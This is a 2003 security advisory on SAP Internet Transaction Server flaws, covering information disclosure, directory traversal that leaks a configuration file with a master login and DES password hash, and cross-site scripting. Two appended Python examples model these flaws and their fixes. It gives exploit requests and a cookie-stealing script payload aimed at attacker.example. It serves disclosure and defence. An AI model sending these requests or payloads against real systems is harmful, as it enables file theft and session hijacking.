[01.09.2003] Internet Transaction Server Multiple Vulnerabilities

Product:        SAP ITS, Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)
Vendor:         SAP (http://www.sap.com/)
Vendor-Status:  vendor contacted (02.08.2003)
Vendor-Patches: SAP notes 598074, 595383 and 654038

Vulnerabilities
  * Path/information disclosure
  * Directory traversal
  * Filename truncation
  * Arbitrary file disclosure
  * Cross site scripting / cookie theft

Exploitable
  Local:  ---
  Remote: YES

Introduction

Visit "http://www.sap.com" for additional product information.

Vulnerability Details

1) DIRECTORY/INFO DISCLOSURE

OBJECT: wgate.dll (win32 CGI communication binary)

DESCRIPTION:
Insufficient input and output validation on several user-supplied parameters allows non-existent values to be passed in the following parameters:

##################
~service
~templatelanguage
~language
~theme
~template
##################

This triggers a number of error messages that may include sensitive information on the operating system, the software version and the directory structure of the attacked server.

EXAMPLE:
---*---
Http-Request: www.server.name/scripts/wgate/pbw2/!?
with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&
---*---

REMARKS:
"~template" may be an undocumented or forgotten variable (NOT confirmed).

2) ARBITRARY FILE DISCLOSURE (Directory Traversal / Filename Truncation)

OBJECT: wgate.dll (win32 CGI communication binary)

DESCRIPTION:
A "..\.." in ~theme walks out of the template directory, and a ~template value padded with spaces beyond the fixed length sheds the ".html" extension that is normally appended (see the remarks below).

EXAMPLE:
---*---
Http-Request: www.server.name/scripts/wgate/pbw2/!?
with params:
~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc+++++++ ++++++ +++++++++++ +++++++ +++++++ ++++++ ++++ +++++ +++++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++++ ++
---*---
(where "+" stands for a space, "%20" URI-encoded, so the whole tail of the value is padding)
On an ITS default installation the request above returns the global server configuration file "global.srvc".

Normally the default template extension (".html"?) is appended to the rest of the template information. Most probably someone wanted to avoid a buffer overflow by truncating the values once they exceed a given length, and that truncation is what makes it possible to shed the ".html" extension: the padding pushes the extension past the cut, and the trailing spaces themselves are ignored when the file is opened.

Now and then the program answers with an error message instead of the requested file. This might be caused by unwanted or additional HTTP request header information (NOT confirmed).

REMARKS:
The global configuration file "global.srvc" contains the master username and a DES-encrypted password:
---*---
~password des26(2c94f116f4393f3d)
~login Master
---*---
A good DES cracker should be able to recover this password either with wordlists or by brute force (NOT confirmed).

3) CROSS SITE SCRIPTING / COOKIE THEFT

OBJECT: wgate.dll (win32 CGI communication binary)

DESCRIPTION:
Insufficient input and output validation on several user-supplied parameters allows the insertion of HTML / client-side scripting tags.

EXAMPLE:
---*---
Http-Request: www.server.name/scripts/wgate.dll?
with params:
~service=-->
---*---

REMARKS:
Because cookies are used extensively for session and state management, cookie theft is very likely. There may be several other locations where HTML/scripting tags can be inserted (NOT confirmed).

GENERAL REMARKS

The above findings derive from an external (black-box) security test. We would like to apologize in advance for potential nonconformities and/or known issues.

Recommended: apply the vendor's hotfixes / software patch(es) listed under Vendor-Patches.

EOF
Martin Eiszner / @2003
m.eiszner at sec-consult dot com
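The padding trick in finding 2, modelled in Python as an added example (this is not the advisory's or SAP's code; the real wgate.dll internals are not known from the advisory). The template root, the fixed buffer length MAX_PATH_LEN and the theme allowlist are hypothetical; the model reproduces only the behaviour the advisory describes: ".html" is appended, the whole path is cut to a fixed length, and Win32 ignores trailing spaces in a filename. The hardened function beside it allowlists the inputs and proves the normalised path stays under the root, which also stops the arbitrary-value probing from finding 1.

```python
"""Added example, not code from the advisory or from SAP: a Python model of the
template-path construction behind finding 2, with a hardened version.

Hypothetical assumptions: TEMPLATE_ROOT, MAX_PATH_LEN and KNOWN_THEMES below.
"""
import ntpath
import re
from typing import Optional

TEMPLATE_ROOT = r"C:\ITS\templates\pbw2"   # assumed layout: <its>\templates\<service>\<theme>
MAX_PATH_LEN = 64                           # assumed fixed buffer length (hypothetical)
KNOWN_THEMES = {"99", "dm"}                 # assumed allowlist of installed themes
IDENT_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def vulnerable_template_path(theme: str, template: str) -> str:
    """Model of the append-then-truncate behaviour the advisory describes."""
    raw = ntpath.join(TEMPLATE_ROOT, theme, template) + ".html"
    truncated = raw[:MAX_PATH_LEN]            # buffer cut: may drop the ".html"
    # Win32 strips trailing spaces from the last path component, so the
    # attacker's padding vanishes and the shortened name is opened as-is.
    return ntpath.normpath(truncated.rstrip(" "))


def safe_template_path(theme: str, template: str) -> Optional[str]:
    """Allowlist the inputs, then prove the normalised path stays under the root."""
    if not IDENT_RE.fullmatch(theme) or not IDENT_RE.fullmatch(template):
        return None                           # no separators, dots or padding
    if theme not in KNOWN_THEMES:
        return None                           # also stops the probing in finding 1
    candidate = ntpath.normpath(ntpath.join(TEMPLATE_ROOT, theme, template + ".html"))
    root = ntpath.normpath(TEMPLATE_ROOT).lower() + "\\"
    if not candidate.lower().startswith(root) or not candidate.lower().endswith(".html"):
        return None                           # escaped the root or lost the extension
    if len(candidate) > MAX_PATH_LEN:
        return None                           # refuse rather than truncate
    return candidate


def demo() -> dict:
    """Benign request, the padded traversal from the advisory, and the fix."""
    padded = r"services\global.srvc" + " " * 40   # "+" in the advisory = %20
    return {
        "benign": vulnerable_template_path("99", "login"),
        "unpadded": vulnerable_template_path(r"..\..", r"services\global.srvc"),
        "padded": vulnerable_template_path(r"..\..", padded),
        "hardened": safe_template_path(r"..\..", padded),
    }


if __name__ == "__main__":
    for name, path in demo().items():
        print(f"{name:9s} -> {path}")
```

Without padding the traversal still works but the server opens "global.srvc.html", which does not exist; with enough padding the 64-byte cut lands inside the spaces and the configuration file itself is opened. The hardened version rejects the request at the character class check before any path is built.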
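The reflected cross-site scripting in finding 3, modelled in Python as an added example (not the advisory's or SAP's code). The advisory's example value is cut off after the comment-closing "-->", so the payload, the error-page markup and the request builder below are all constructed for this illustration; the real wgate.dll response is not reproduced. The block shows the raw reflection beside the entity-encoded version and a black-box check of the kind the tester would have run.

```python
"""Added example, not code from the advisory or from SAP: a model of the
reflected XSS in finding 3, the output encoding that removes it, and a
black-box check for the reflection. Markup, URL and payload are constructed.
"""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload: closes an HTML comment the way the advisory's
# "~service=-->" does, then ships document.cookie to an attacker-controlled host.
PAYLOAD = '--><script>location="http://attacker.example/?c="+document.cookie</script>'
TAG_RE = re.compile(r"<\s*(script|img|iframe|svg)\b", re.IGNORECASE)


def build_request(service: str) -> str:
    """URL with the request shape from finding 3; the value is percent-encoded."""
    return "http://www.server.name/scripts/wgate.dll?~service=" + quote(service, safe="")


def service_from_request(url: str) -> str:
    """What the CGI sees after decoding QUERY_STRING."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("~service", [""])[0]


def vulnerable_error_page(service: str) -> str:
    """Echoes the raw parameter into an HTML comment and into the visible text."""
    return ("<html><!-- service: " + service + " --><body>"
            "Service '" + service + "' not found.</body></html>")


def hardened_error_page(service: str) -> str:
    """Same page, but every reflected occurrence is HTML-entity encoded."""
    safe = html.escape(service, quote=True)   # < > & " ' become entities
    return ("<html><!-- service: " + safe + " --><body>"
            "Service '" + safe + "' not found.</body></html>")


def reflects_unescaped(render, payload: str) -> bool:
    """Black-box check: do tags absent for a benign value appear for the payload?"""
    baseline = {t.lower() for t in TAG_RE.findall(render("pbw2"))}
    tainted = {t.lower() for t in TAG_RE.findall(render(payload))}
    return bool(tainted - baseline)


if __name__ == "__main__":
    seen = service_from_request(build_request(PAYLOAD))
    print("vulnerable reflects tag:", reflects_unescaped(vulnerable_error_page, seen))
    print("hardened reflects tag:  ", reflects_unescaped(hardened_error_page, seen))
```

Encoding at the point of output is the fix the advisory implies: once "<" and ">" are entities, "-->" cannot close the comment and "<script>" cannot open a tag, so the value is shown but never interpreted. Marking the session cookie HttpOnly (already supported by IE 6 SP1 when this advisory was written) blunts the cookie-theft angle but does not remove the script injection itself.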